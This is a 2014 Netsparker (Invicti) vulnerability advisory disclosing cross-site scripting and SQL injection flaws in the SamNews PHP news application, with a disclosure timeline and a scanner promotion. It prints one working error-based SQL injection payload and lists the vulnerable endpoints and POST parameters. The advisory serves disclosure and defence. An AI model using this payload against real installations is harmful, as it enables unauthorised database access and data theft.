XSS and SQL Injection Vulnerabilities in SamNews
Advisory by Netsparker (now Invicti)
Name: Critical XSS and SQL Injection Vulnerabilities in SamNews
Software: SamNews v1.1 and possibly below.
Vendor Homepage: http://samjlevy.com/samnews/
Vulnerability Type: Cross-Site Scripting and SQL Injection
Researcher: Omar Kurt
Advisory Reference: NS-14-005
SamNews is a social news application like Digg and Reddit. SamNews is written in PHP/MySQL.
SamNews is affected by XSS and SQL Injection vulnerabilities in version 1.1.
Example PoC urls are as follows:
SQL Injection Vulnerabilities
id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
http://example.com/samnews/register(POST – params: email, email_verify)
http://example.com/samnews/submit/bulk(POST – params: url_1)
http://example.com/samnews/reset/email(POST – params: email, email_verify)
http://example.com/samnews/ctlist(POST – params: name)
Learn more about XSS and SQL Injection vulnerabilities:
06/01/2014 – First Contact – No Response
19/02/2014 – Advisory Released
It has been discovered on testing of Invicti Web Application Security Scanner.
Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Invicti’s unique detection and exploitation techniques allows it to be dead accurate in reporting hence it’s the first and the only False Positive Free web application security scanner.